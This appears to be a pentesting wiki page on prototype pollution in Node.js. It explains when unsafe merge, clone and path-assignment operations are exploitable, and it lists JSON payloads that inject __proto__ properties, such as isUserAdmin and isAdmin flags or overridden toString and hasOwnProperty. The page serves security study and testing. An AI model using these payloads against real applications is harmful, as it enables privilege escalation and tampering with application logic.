# Prototype Pollution

Affects Node.js

{% hint style="info" %} <mark style="color:purple;">**Prototype pollution happens at some unsafe**</mark>**&#x20;**<mark style="color:orange;">**`merge`**</mark><mark style="color:purple;">**,**</mark>**&#x20;**<mark style="color:orange;">**`clone`**</mark><mark style="color:purple;">**,**</mark>**&#x20;**<mark style="color:orange;">**`extend`**</mark>**&#x20;**<mark style="color:purple;">**and**</mark>**&#x20;**<mark style="color:orange;">**`path assignment`**</mark>**&#x20;**<mark style="color:purple;">**operations on malicious**</mark>**&#x20;**<mark style="color:orange;">**`JSON`**</mark>**&#x20;**<mark style="color:purple;">**objects.**</mark>

* <mark style="color:purple;">**This is exploitable only if any of the following three happens:**</mark>
  * <mark style="color:red;">**`Object recursive merge`**</mark>
  * <mark style="color:red;">**`Property definition by path`**</mark>&#x20;
  * <mark style="color:red;">**`Object clone`**</mark>
* <mark style="color:purple;">Some of the most popular libraries being affected are</mark> <mark style="color:orange;">**`lodash`**</mark> <mark style="color:purple;">and</mark> <mark style="color:orange;">**`Hoek`**</mark>
* <mark style="color:orange;">**`Templates`**</mark> <mark style="color:purple;">are a good target for prototype pollution.</mark>
  {% endhint %}

<details>

<summary><mark style="color:purple;"><strong><code>Payloads</code></strong></mark></summary>

* <mark style="color:purple;">The most straightforward example of prototype pollution involves injecting the</mark> <mark style="color:orange;">**`__proto__`**</mark> <mark style="color:purple;">property, which affects all objects that inherit from</mark> <mark style="color:orange;">**`Object.prototype`**</mark><mark style="color:purple;">**.**</mark>

{% code title="This example adds the isUserAdmin property to the prototype chain:" overflow="wrap" %}

```json
{
  "__proto__": {
    "isUserAdmin": true
  }
}
```

{% endcode %}

{% code title="Also, you can directly manipulate the Object.prototype by modifying the **proto** property. This could be done in objects passed to vulnerable code:" overflow="wrap" %}

```json
{
  "__proto__": {
    "toString": "malicious code"
  }
}
```

{% endcode %}

{% code title="If the application allows you to define properties via paths (e.g., obj.a.b):" overflow="wrap" %}

```json
{
  "a.b.__proto__.isHacked": true
}
```

{% endcode %}

{% code title="The constructor property is part of the prototype chain for JavaScript objects:" overflow="wrap" %}

```json
{
  "__proto__.constructor": "MaliciousFunction"
}
```

{% endcode %}

{% code title="The hasOwnProperty method is often used to check if an object has a property, but it can be overridden in the prototype:" overflow="wrap" %}

```json
{
  "__proto__.hasOwnProperty": false
}
```

{% endcode %}

{% code title="If an attacker can manipulate built-in objects' prototypes (like Array.prototype or Function.prototype), they could affect the behavior of all instances of those types:" overflow="wrap" %}

```json
{
  "__proto__.length": 1000
}
```

{% endcode %}

{% code title="If the application uses a templating engine and allows user input to be rendered without sanitization, an attacker might inject a prototype pollution payload directly via the template:" overflow="wrap" %}

```json
{
  "__proto__": {
    "isAdmin": true
  }
}
```

{% endcode %}

{% code title="You can directly inject properties into the prototype of custom classes or objects:" overflow="wrap" %}

```json
{
  "customObjectPrototype.isHacked": true
}
```

{% endcode %}

</details>